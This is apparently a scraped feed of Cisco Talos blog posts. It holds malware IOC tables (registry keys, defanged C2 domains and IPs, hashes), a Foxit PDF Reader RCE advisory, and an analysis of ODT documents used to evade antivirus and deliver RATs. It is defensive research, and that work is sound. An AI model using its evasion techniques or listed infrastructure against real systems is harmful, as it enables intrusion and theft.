<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\slzfemsh
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\qjxdckqf
2
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\gzntsagv
1
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\exlrqyet
1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
239[.]255[.]255[.]25010
69[.]55[.]5[.]25010
46[.]4[.]52[.]10910
176[.]111[.]49[.]4310
85[.]25[.]119[.]2510
144[.]76[.]199[.]210
144[.]76[.]199[.]4310
43[.]231[.]4[.]710
192[.]0[.]47[.]5910
173[.]194[.]207[.]26/3110
85[.]114[.]134[.]8810
172[.]217[.]197[.]26/319
98[.]136[.]96[.]92/319
172[.]217[.]5[.]2288
67[.]195[.]228[.]848
67[.]195[.]204[.]72/308
213[.]209[.]1[.]1297
216[.]146[.]35[.]357
211[.]231[.]108[.]467
104[.]47[.]53[.]367
213[.]205[.]33[.]62/317
188[.]125[.]72[.]737
104[.]47[.]6[.]336
23[.]160[.]0[.]1086
216[.]163[.]188[.]546
*See JSON for more IOCs
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
250[.]5[.]55[.]69[.]in-addr[.]arpa10
250[.]5[.]55[.]69[.]zen[.]spamhaus[.]org10
250[.]5[.]55[.]69[.]cbl[.]abuseat[.]org10
250[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net10
whois[.]iana[.]org10
250[.]5[.]55[.]69[.]bl[.]spamcop[.]net10
whois[.]arin[.]net10
mx-aol[.]mail[.]gm0[.]yahoodns[.]net10
eur[.]olc[.]protection[.]outlook[.]com10
250[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org10
aol[.]com10
hotmail-com[.]olc[.]protection[.]outlook[.]com10
microsoft-com[.]mail[.]protection[.]outlook[.]com10
honeypus[.]rusladies[.]cn10
marina99[.]ruladies[.]cn10
sexual-pattern3[.]com10
coolsex-finders5[.]com10
mta5[.]am0[.]yahoodns[.]net9
mx-eu[.]mail[.]am0[.]yahoodns[.]net9
etb-1[.]mail[.]tiscali[.]it8
tiscalinet[.]it8
smtp-in[.]libero[.]it7
libero[.]it7
tiscali[.]it7
hanmail[.]net7
*See JSON for more IOCs
Files and or directories createdOccurrences
%SystemRoot%\SysWOW64\config\systemprofile10
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'>10
%TEMP%\<random, matching '[a-z]{8}'>.exe10
%System32%\<random, matching '[a-z]{8}\[a-z]{6,8}'>.exe (copy)8
%TEMP%\hjekdqa.exe2

File Hashes

08d08aedaab20d189db5d91b829e46d6485c9a80b0de1865ae66a6636a8f10a4 1060301d58657b07ab260d50e92c44112125ca9b225b049dafd428e47ff8c864 4518935de0954262f693d572260e01c37c5b3805358b4d8034f58a47208c15c3 7939dc52cea024666043b03e3dd324c3d0f24adb4cc9f05c75d45443eca6ffe7 8d1595bd4b6e37b043fbceffce01667b5a711cad028499a69285ced37db4a909 924242b90be9bca981b3ed8b7a7dcac8d6e192077d6ab0ce70d64390af8263a4 a97806cc79281fd6a5eb1f45b50787e5677f7a49c5e009629c260e2d33bc4dbb b34fc64ebd852b6e63c7926dff44f6bfee7d5b99201ace20f20c478162437410 c515f1bc8e5a44616976ea05ba3061b81670f5b5a2763b7abb2e9d0abcb62642 e6b5db7be9886ce7547bc05f42d87003215824316ac7126f3722518e7a1f6cd1

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (9723)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP request). Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Excessively long PowerShell command detected - (6212)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
Kovter injection detected - (1773)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click fraud Trojan that can also act as an information stealer. Kovter is also file-less malware meaning the malicious DLL is stored inside Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Madshi injection detected - (1501)
Madshi is a code injection framework that uses process injection to start a new thread if other methods to start a thread within a process fail. This framework is used by a number of security solutions. It is also possible for malware to use this technique.
Process hollowing detected - (755)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Trickbot malware detected - (636)
Trickbot is a banking Trojan which appeared in late 2016. Due to the similarities between Trickbot and Dyre, it is suspected some of the individuals responsible for Dyre are now responsible for Trickbot. Trickbot has been rapidly evolving over the months since it has appeared. However, Trickbot is still missing some of the capabilities Dyre possessed. Its current modules include DLL injection, system information gathering, and email searching.
Gamarue malware detected - (190)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Special Search Offer adware - (110)
Special Search Offer adware displays unwanted advertising in the form of popups or by injecting into browsers and altering advertisements on webpages. Adware has also been known to download and install malware.
Installcore adware detected - (95)
Install core is an installer which bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that display advertising in the form of popups or by injecting into browsers and adding or altering advertisements on webpages. Adware is known to sometimes download and install malware.
Dealply adware detected - (84)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.

Vulnerability Spotlight: Foxit PDF Reader JavaScript Array.includes remote code execution vulnerability

$
0
0

Aleksandar Nikolic of Cisco Talos discovered this vulnerability.

Foxit PDF Reader contains a remote code execution vulnerability in its JavaScript engine. Foxit aims to be one of the most feature-rich PDF readers on the market, and contains many similar functions to that of Adobe Acrobat Reader. The software uses JavaScript at several different points when opening a PDF. A bug exists in the JavaScript reading function that results in a large amount of memory to be allocated, which quickly uses up all available memory. An attacker could exploit this vulnerability to then gain the ability to remotely execute code.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Foxit to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Foxit PDF Reader JavaScript Array.includes remote code execution vulnerability (TALOS-2019-0793/CVE-2019-5031)

An exploitable memory corruption vulnerability exists in the JavaScript engine of Foxit Software's Foxit PDF Reader, version 9.4.1.16828. A specially crafted PDF document can trigger an out-of-memory condition which isn't handled properly, resulting in arbitrary code execution. An attacker needs to trick the user to open the malicious file to trigger this vulnerability. If the browser plugin extension is enabled, visiting a malicious site can also trigger the vulnerability.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Foxit PDF Reader, version 9.4.1.16828 is affected by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 49648, 49649

Open Document format creates twist in maldoc landscape

$
0
0
By Warren Mercer and Paul Rascagneres.

Introduction


Cisco Talos recently observed attackers changing the file formats they use in an attempt to thwart common antivirus engines. This can happen across other file formats, but today, we are showing a change of approach for an actor who has deemed antivirus engines perhaps "too good" at detecting macro-based infection vectors. We've noticed that the OpenDocument (ODT) file format for some Office applications can be used to bypass these detections. ODT is a ZIP archive with XML-based files used by Microsoft Office, as well as the comparable Apache OpenOffice and LibreOffice software.

There have recently been multiple malware campaigns using this file type that are able to avoid antivirus detection, due to the fact that these engines view ODT files as standard archives and don't apply the same rules it normally would for an Office document. We also identified several sandboxes that fail to analyze ODT documents, as it is considered an archive, and the sandbox won't open the document as a Microsoft Office file. Because of this, an attacker can use ODT files to deliver malware that would normally get blocked by traditional antivirus software.

We only found a few samples where this file format was used. The majority of these campaigns using malicious documents still rely on the Microsoft Office file format, but these cases show that the ODT file format could be used in the future at a more successful rate. In this blog post, we'll walk through three cases of OpenDocument usage. The two first cases targets Microsoft Office, while the third one targets only OpenOffice and LibreOffice users. We do not know at this time if these samples were used simply for testing or a more malicious context.




Case study No. 1: ODT with OLE object and HTA script


The first campaign we'll look at used malicious ODT documents with an embedded OLE object. A user must click on a prompt to execute the embedded object. We saw attackers use this methodology to target both Arabic and English-speaking users.




In both campaigns, the OLE Object deployed an HTA file and executed it:



The two HTA scripts downloaded a file on top4top[.]net. This website is a popular Arabic file-hosting platform:



The two campaigns downloaded a remote administrative tool (RAT). In the Arabic campaign, the payload is the longstanding NJRAT malware. The C2 server in this case is amibas8722[.]ddns[.]net, which pointed to an Algerian ISP:



RevengeRAT was the payload in the English campaign, with its C2 server hidden behind the portmap platform (wh-32248[.]portmap[.]io). The PE is stored in registry and executed with a scheduled task and PowerShell script:



The operating mode is similar to the one we previously published here. In both cases, the same RAT with the same patches, the payload is stored in the registry, a PowerShell script decodes and executes it and, finally, the Portmap platform hides the final IP of the attacker infrastructure. Based on these elements, we assess with medium confidence that these two cases are linked by the same actor or framework.

Case study No. 2: ODT with OLE object and embedded malware


In the second case, the ODT file also contains an OLE object:

$ unzip -l 80c62c646cce264c08deb02753f619da82b27d9c727e854904b9b7d88e45bf9e
Archive: 80c62c646cce264c08deb02753f619da82b27d9c727e854904b9b7d88e45bf9e

Length Date Time Name
--------- ---------- ----- ----

39 1980-01-01 00:00 mimetype
1540 1980-01-01 00:00 settings.xml
805 1980-01-01 00:00 META-INF/manifest.xml
1026 1980-01-01 00:00 meta.xml
491520 1980-01-01 00:00 Object 1
17784 1980-01-01 00:00 ObjectReplacements/Object 1
3354 1980-01-01 00:00 content.xml
6170 1980-01-01 00:00 styles.xml

--------- -------
522238 8 files
Again, this document requires user interaction. The OLE execution writes "Spotify.exe" to the victim machine, which is clearly not the legitimate Spotify platform executable. This .NET binary deflates a new binary stored as a resource. The new PE is a new binary packed with a multitude of different packers such as Goliath, babelfor.NET and 9rays.



Once all the layers are unpacked, the final payload is AZORult. We can see the infamous strings of this stealer in the final binary:



Case study No. 3: ODT with StarOffice Basic


We also discovered a third campaign that targeted OpenOffice and LibreOffice, but not Microsoft Office. In this case, the attackers used the equivalent of macros in Microsoft Office documents in the StarOffice Basic open-source software. StarOffice Basic's code is located in the Basic/Standard/ repository inside the ODT archive:
$ unzip -l 525ca043a22901923bac28bb0d74dd57
Archive: 525ca043a22901923bac28bb0d74dd57

Length Date Time Name
--------- ---------- ----- ----
0 2019-08-19 12:53 Thumbnails/
728 2019-08-19 12:52 Thumbnails/thumbnail.png
10843 2019-08-19 12:52 styles.xml
0 2019-08-19 12:53 Basic/
0 2019-08-19 13:22 Basic/Standard/
1317 2019-08-19 13:00 Basic/Standard/Module1.xml
348 2019-08-19 12:52 Basic/Standard/script-lb.xml
338 2019-08-19 12:52 Basic/script-lc.xml
8539 2019-08-19 12:52 settings.xml
0 2019-08-19 12:53 Configurations2/
0 2019-08-19 12:53 Configurations2/accelerator/
0 2019-08-19 12:52 Configurations2/accelerator/current.xml
0 2019-08-19 12:53 META-INF/
1390 2019-08-19 12:52 META-INF/manifest.xml
899 2019-08-19 12:52 manifest.rdf
1050 2019-08-19 12:52 meta.xml
39 2019-08-19 12:52 mimetype
3297 2019-08-19 12:52 content.xml
--------- -------
28788 18 files
Here is an example:



The code downloads and executes a binary called "plink." The software creates SSH communications. The IP is a local network IP and not an IP available on the internet, which is interesting because the other documents we identified download an executable from the local network. We do not know if it is a test, a pentest framework, or if it was used in a specific context. There is the possibility that an actor could use this to carry out additional lateral movement within an already compromised environment.

We identified attempts to download Metasploit payloads:



And finally, some more obfuscated versions using WMI in order to execute the downloaded payload:



These samples only targets users using OpenOffice and StarOffice. We still do not know the final payload or the context under which this document was deployed.

Conclusion


Microsoft Office is a commonly attacked platform and is considered the most popular productivity suite on the market. This, similarly to the Microsoft Windows operating system, makes it a prime target for threat actors.

By attacking known platforms, attackers increase their chances of gaining access to machines. And the use of the ODT file format shows that actors are happy to try out different mechanisms of infection, perhaps in an attempt to see if they are these documents have a higher rate of infection or are better at avoiding detection. As we point out some AV engines and sandboxes do not handle these file formats with the appropriate method so they become "missed" in some instances. Whilst less people may avail of these pieces of software the actor may have a higher success rate due to low detections. The potential for specifically targeted attacks can also increase with the use of lesser used file formats. This can be coupled with OSINT from an attacker to understand who has potentially began to use LibreOffice formats by referring to the LibreOffice public migration page here, whilst this is a nice feature to show the uptake in their software it also leaves a valuable piece of information pertaining to what infrastructures are running their software.

Coverage


Intrusion prevention systems such as SNORT® provide an effective tool to detect this activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

Additional ways our customers can detect and block these threats are listed below.



Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs


Case #1


ODT Documents:

de8e85328b1911084455e7dc78b18fd1c6f84366a23eaa273be7fbe4488613dd
f24c6a56273163595197c68abeab7f18e4e2bedd6213892d83cdb7a191ff9900

PE:

02000ddf92ceb363760acc1d06b7cd1f05be7a1ca6df68586e77cf65f4c6963e
19027327329e2314b506d9f44b6871f2613b8bb72aa831004e6be873bdb1175d

C2 servers:

wh-32248[.]portmap[.]io
amibas8722[.]ddns[.]net

Payload storage:

top4top[.]net

Case #2


ODT document: 80c62c646cce264c08deb02753f619da82b27d9c727e854904b9b7d88e45bf9e

PE: 20919e87d52b1609bc35d939695405212b8ca540e50ce8bece01a9fccfa70169

Case #3


2f4aa28974486152092669c85d75232098d32446adefeeef3a94ad4c58af0fc8
d099eac776eabf48f55a75eb863ad539a546202da02720aa83d88308be3ce4ca
84cb192cc6416b20293dfb8c621267e1584815a188b67757fa0d1af29a7cfdcd
b2b51864fa2f80f8edbdaf6721a6780e15a30291a748c2dfc52d574de0d8c3ed
f9138756639104e2c392b085cc5a98b1db77f0ed6e3b79eacac9899001ed7116
efb81fb8095319f5ee6fd4d6741b80386a824b9df05460d16d22cad1d6bbb35d
f5194cc197d98ed9078cceca223e294c5ec873b86cbeff92eb9eaca17fc90584
429d270195bed378495349cf066aee649fd1c8c450530d896844b1692ddddc77

Threat Roundup for September 27 to October 4

$
0
0
Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 27 and Oct. 4. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
The most prevalent threats highlighted in this roundup are:
Threat NameTypeDescription
Win.Malware.Zusy-7191579-1 Malware Zusy, also known as TinyBanker or Tinba, is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe." When the user accesses a banking website, it displays a form to trick the user into submitting personal information.
Win.Malware.Osiris-7191711-1 Malware Osiris is a banking trojan derived from the Kronos banking trojan and is known to include features such as the ability to communicate with its command and control (C2) servers via Tor and the ability to intercept credentials typed into web forms.
Win.Dropper.Cerber-7192026-0 Dropper Cerber is ransomware that encrypts documents, photos, databases and other important files. Historically, this malware would replace files with encrypted versions and add the file extension ".cerber," although in more recent campaigns, this is no longer the case.
Win.Virus.Expiro-7192043-0 Virus Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Malware.Neurevt-7192122-0 Malware Neurevt, also known as BetaBot, is a remote access trojan that employs multiple anti-debug and anti-analysis techniques to attempt to avoid detection.
Doc.Dropper.Emotet-7181950-0 Dropper Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails. It recently resurfaced after going quiet over the summer of 2019.

Threat Breakdown

Win.Malware.Zusy-7191579-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: EEFEB657
82
MutexesOccurrences
EEFEB65787
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
216[.]218[.]185[.]16254
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
brureservtestot[.]cc57
Files and or directories createdOccurrences
%HOMEPATH%\AppData\LocalLow\EEFEB65784
%APPDATA%\EEFEB65782
%APPDATA%\EEFEB657\bin.exe82

File Hashes

027ecc7f1e2d38d420486e9e0fe9d50bdceb8b50512258a922e69f55e0c18ec7 0a72c56814a288218c9346115935828be03e870fa858a721f738af4dab311205 0a9fd449b13193c771c2d401dd6538cab6dbb2c37e0573b05cc72802b90687cf 0b1fa36c3ae5bdb7c52c40e08566cceac37965265e5b2552fdf121add431ce45 0ce401aa748f86238016408aa5c7b082a83499a2cbf2d5a1370b3bef8b983be1 1266c2bccc5fa61af8b611d3c7f210b11fed7d22dbb24305bf6003b1891399fe 12ef657ff31b48b90fbb20b212643f7aa62b66dae80cd19feed7356089f18451 149e17e85475bf4f6b4be6c0f1924e8554ec982f949fcb833c8c6bc3a7673669 1a0d6dda8e405f9342fadc87a1a6b395250bfcf910f5e2e4cfba806de2b58eee 1b3ddf7b2a71290a0a86e974a323dde16999e7eaa2be2b8cd63c066a7ba6a052 1fa747673986b53ed65fa0a6b39a024ef02191966184a6fd8844e742fdbc3d58 22b172ead1618e0c49a6d94c4da6c7ba1d401549276bc3a7f3d78c18909e6793 2b9b82e7ee0d8661b2268f83a010e8379e28930cc7f9f224d06fcd37b48f566d 2ba984bf6a2e039225b78faf309d087db56a6a2eac5efc73f5f20ff941c58442 2c33aa852da4527f49dae1e6bb1940b4c7cd2c814da0a90ab8a2a5de5fee6726 2c594bcf891b90e24c8bd445d5ddbe9cb50f5d101d559d564ab8246535d2af53 306774877254b8ca51a2bf446834cc34126ac56ebaf9d935442c25e533485fc1 38efe6d2c2e264e83d54cebc4bb14766c344741e39b510b027882d1ef2bbb798 43aee0e0761a3e90aa35d3401634397be8d1691d88ed2bdaaf2f60c915de53e2 467e66e8fc95c740cc3beee432d6a5e85bc533aa6dd609865376dacf0a0ef6e7 47bc6db08ad7826b5a68644d6f013405e4e6842525b8a4d05a2abdabfd735fc4 484f52c4598eddc67147f8558c9bf9701d1c4d2f5bcc1b619a43422863d1e8ce 48624a37bd7f3faacc3d56c106a40189c413dc4ec4407c00a1034578cfb6a9b3 4a3a67a893cf7e49a5aef587d840867589841e93ae7f418019d6f94daba58c47 4bd1deaa13a4a9cef75f84dba895645a24ac7f4b4bd69d22ea5800a3c682cc54
*See JSON for more IOCs

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Malware.Osiris-7191711-1

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: Hidden
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\ADVANCED
Value Name: HideFileExt
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION
Value Name: d41d8cd9
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION
Value Name: d41d8cd9
11
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d41d8cd9
11
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: d41d8cd9
11
MutexesOccurrences
Global\d41d8cd98f00b204e9800998ecf8427e11
Global\{B1F6EFF9-6297-200E-B1F6-F9EF29AA7A00}11
Global\{BF6093C4-5FBA-D878-BF60-C4933C20A000}9
Global\dd4b21e9ef71e1291183a46b913ae6f29
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
updateserver4[.]top11
updateserver7[.]top11
updateserver5[.]top11
updateserver9[.]top11
updateserver2[.]top11
updateserver8[.]top11
updateserver10[.]top11
updateserver6[.]top11
updateserver3[.]top11
Files and or directories createdOccurrences
%APPDATA%\Mozilla\Firefox\Profiles\<profile ID>.default\user.js11
%System32%\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb9
%APPDATA%\Microsoft\{56984C2C-8905-4BFA-8553-0BE17726FCD5}4
%APPDATA%\Microsoft\{56984C2C-8905-4BFA-8553-0BE17726FCD5}\d41d8cd9.exe4
%APPDATA%\Microsoft\{56984C2C-8905-4BE2-8553-13E17726E4D5}2
%APPDATA%\Microsoft\{56984C2C-8905-4BE2-8553-13E17726E4D5}\d41d8cd9.exe2
%APPDATA%\Microsoft\{9A96A2D0-FE36-485E-B81C-0132628C474C}\dd4b21e9.exe1
%APPDATA%\Microsoft\{03FFB58D-7238-49DA-9378-5224CBD1F546}\dd4b21e9.exe1
%APPDATA%\Microsoft\{575A5E0A-FD63-4DF1-BF50-033349A4ADA1}\dd4b21e9.exe1
%APPDATA%\Microsoft\{33C67668-6248-47D0-8FDF-197713CA89A1}\dd4b21e9.exe1
%APPDATA%\Microsoft\{FA144B4E-77DF-4C1F-A472-60E20FF489C2}\dd4b21e9.exe1
%APPDATA%\Microsoft\{507C47B0-1E13-4926-92BC-C40E8A4CB040}\dd4b21e9.exe1
%APPDATA%\Microsoft\{F807BD90-CAC5-40B0-828A-CA06ED52C5F4}\dd4b21e9.exe1
%APPDATA%\Microsoft\{780EBCFD-EADA-4438-9DC3-324538311844}\dd4b21e9.exe1

File Hashes

05ba5705db7ff502d4422ea7d4ef32422d9b2c0966a42b6b3d76c126d51e846d 0aae22c6557c43cf199421eb6b367d23469909b5f860468c1e42b0e5730808d5 2c5fdc198324cc33dc93d20dc58195608661ed5c83cf10619efdbc1fddeb51e5 4c6f284b0be38d51af26ee87e687cbba32184e0b21203758419953e1f476e841 4f645f4ae3dcf8bfebf4dde1b6d20497ce25fbbc1f6f691d40a95d7bff7a2d6c 5ba866dbb2ace005cfa32382404ac0927695f52bedce0804564549e633be8318 6478b2ce18a6a7671a39aa254ba0c4aaf123a0f5b27e9c86e323b663332f18f8 6f2add6401f59d813de66bc1152240f2e7622e293a0b10c5a804790b7068195b 6f9d45cf7571949de6db54d2e4c642ae63e30ba0eaf4f3075b8cd36749171377 919d3b68ee264053ae4f0f3d9caf93c055c421dabdc419d5d52d09d089142498 f7ce779ae0308c0c0da8280d3182506eda97778e91969eb4ea86dc3bfddb12df

Coverage

ProductProtection
AmpThis has coverage
Cloudlock N/A
CwsThis has coverage
Email SecurityThis has coverage
Network Security N/A
Stealthwatch N/A
Stealthwatch Cloud N/A
Threat GridThis has coverage
UmbrellaThis has coverage
WsaThis has coverage

Screenshots of Detection

AMP


ThreatGrid


Umbrella




Win.Dropper.Cerber-7192026-0

Indicators of Compromise

Registry KeysOccurrences
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
Value Name: Run
25
<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR
Value Name: AutoRun
25
<HKCU>\CONTROL PANEL\DESKTOP
Value Name: SCRNSAVE.EXE
25
<HKCU>\PRINTERS\DEFAULTS\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} 25
<HKCU>\PRINTERS\DEFAULTS 25
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: Magnify
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: Magnify
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: wusa
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: wusa
2
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: LocationNotifications
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: FlashPlayerApp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: FlashPlayerApp
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: DWWIN
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: DWWIN
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: mshta
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: mshta
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: autoconv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: autoconv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: RMActivate_isv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: RMActivate_isv
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: eventcreate
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: eventcreate
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: w32tm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE
Value Name: w32tm
1
<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
Value Name: netbtugc
1
MutexesOccurrences
shell.{381828AA-8B28-3374-1B67-35680555C5EF}25
shell.{785F99DE-E95E-3921-EE78-D7777849AA01}1
shell.{967822DD-7042-E624-BEA7-C7EF520E90F5}1
shell.{A92873EC-3840-982A-DA5D-DDDC12AA8495}1
IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
31[.]184[.]234[.]0/2525
216[.]239[.]34[.]218
216[.]239[.]32[.]217
216[.]239[.]36[.]215
216[.]239[.]38[.]215
54[.]88[.]175[.]1493
Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
ipinfo[.]io25
Files and or directories createdOccurrences
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}25
%TEMP%\# DECRYPT MY FILES #.html3
%TEMP%\# DECRYPT MY FILES #.txt3
%TEMP%\# DECRYPT MY FILES #.url3
%TEMP%\# DECRYPT MY FILES #.vbs3
%HOMEPATH%\# DECRYPT MY FILES #.html2
%HOMEPATH%\# DECRYPT MY FILES #.txt2
%HOMEPATH%\# DECRYPT MY FILES #.url2
%HOMEPATH%\# DECRYPT MY FILES #.vbs2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\Magnify.lnk2
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\Magnify.exe2
%System32%\Tasks\Magnify2
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\wusa.lnk2
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\wusa.exe2
%System32%\Tasks\wusa2
%System32%\Tasks\mtstocom1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\odbcconf.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\odbcconf.exe1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\netbtugc.lnk1
%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\netbtugc.exe1
%APPDATA%\Microsoft\Windows\Start Menu\Programs\StartUp\expand.lnk1
